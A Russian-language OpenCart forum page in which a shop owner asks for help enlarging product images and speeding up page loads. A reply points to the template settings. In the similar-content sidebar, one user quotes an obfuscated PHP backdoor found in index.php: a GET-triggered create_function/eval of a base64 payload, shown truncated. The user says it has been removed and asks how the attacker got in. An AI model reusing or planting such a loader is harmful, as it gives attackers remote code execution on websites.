Jump to content

Recommended Posts

Добрый день, необходимо увеличить отображение фотографий товаров на главной странице, в каталогах и в самой карточке товара.
Так же устранить медленную загрузку страниц. Cайт goomy.ru
Пишите в лс по стоимости работы.

Share this post


Link to post
Share on other sites

А в настройках шаблона разве нету? У автора шаблона спроси, или шаблон левый?

Если по умолчанию, то Дополнения/Дополнения/Шаблоны - там и выставляешь размеры.

Share this post


Link to post
Share on other sites

В настройках шаблона есть только настройка стилей, спасибо за подсказку с дополнениями.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Similar Content

    • By insona10
      Всем привет, использую сейчас стандартный бесплатный модуль от Яндекс Маркета и столкнулся с проблемой. Этот модуль выгружает все опции размеров товара на сайт, даже которых нет. Например есть 4 размера у товара, 1,2,3 - нет, а 4 - есть, вот модуль выгружает все размеры и соответственно, клиент переходящий с Маркета по карточке размера 1, попадает на карточку товара, где только размер 4, и цена дороже соответственно, из-за этого блокирует Маркет.
       
      Нужно настроить, чтобы он брал данные о количестве из вкладки Опции карточки товаров? Или еще варианты, чтобы выгружал только те размеры, которые есть на сайте.
      Очень желательно вот через этот модуль: 
       
       
    • By bolahg
      Добрый день. 
      Есть сайт на opencart 2.1, имеется желание вынести стили, скрипты, изображения на поддомены на том же сервере. Возможно тема уже поднималась, но поиском у меня не получилось найти ответа на вопрос.
      Может есть какая инструкция с порядком изменений в cms или модуль, для того чтобы вся статика грузилась с указанных поддоменов -  подскажите пожалуйста
    • By sabero
      Помогите, пожалуйста, как решить проблему. В дефолтном шаблоне (1 скрин) все подпункты в категории выдвигаются так, что их сразу видно. У меня же(2) они почему-то только со скроллом, и тот с чудовищной чувствительностью. Как решить проблему?


    • By Anton999
      Приветствую!
       
      Кто сталкивался? К index.php прицепилась такая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было прицеплено, мне пока не известна. Так жить дальше нельзя.
       
      Возможно кто-то сталкивался с подобным, буду благодарен за дельный совет, как пролезли, как закрыть дыру.
       
      Всем спасибо!
    • By jtgroup
      Добрый день!
      требуется начальная настройка сайта на поддомене. с последующим переносом на основной домен.
      сайт на ocstore 3.0 шаблон лайтшоп. установлены модули мультиязычности и джеткэш.
      1. в идеале запустить на php 7 сейчас php 5.6
      1.1 настройка .htaccess , настройка https 
      2. проверка работоспособности ( сейчас при переходе в категории бросает снова на главную)
      3. перенос сайта на основной домен. требуется чуть позже после того как я наполню сайт.
       
  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.